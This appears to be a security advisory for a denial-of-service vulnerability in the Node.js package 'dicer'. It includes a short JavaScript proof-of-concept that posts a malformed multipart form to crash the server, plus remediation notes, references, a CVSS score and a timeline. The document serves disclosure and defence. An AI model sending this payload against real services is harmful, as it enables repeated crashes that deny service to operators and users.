
SNYK-JS-DICER-2311764

SNYK-JS-DICER-2311764 PUBLISHED CVSS 7.5 HIGH

## Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can send a modified form to the server and crash the Node.js service. The attacker can send the payload again and again so that the service crashes continuously.

## PoC

```js
await fetch('http://127.0.0.1:8000', {
  method: 'POST',
  headers: {
    ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
    ['content-length']: '145',
    connection: 'keep-alive',
  },
  body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
});
```

## Remediation

There is no fixed version for `dicer`.

## References

- [GitHub Commit](https://github.com/mscdex/dicer/pull/22/commits/b7fca2e93e8e9d4439d8acc5c02f5e54a0112dac)
- [GitHub Issue](https://github.com/mscdex/busboy/issues/250)
- [GitHub PR](https://github.com/mscdex/dicer/pull/22)

Risk Scores

CVSS v3.1
7.5
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C

Affected Products

Vendor | Product | Versions

Timeline

  • Dec 7, 2021 CVE Updated
  • May 19, 2022 CVE Published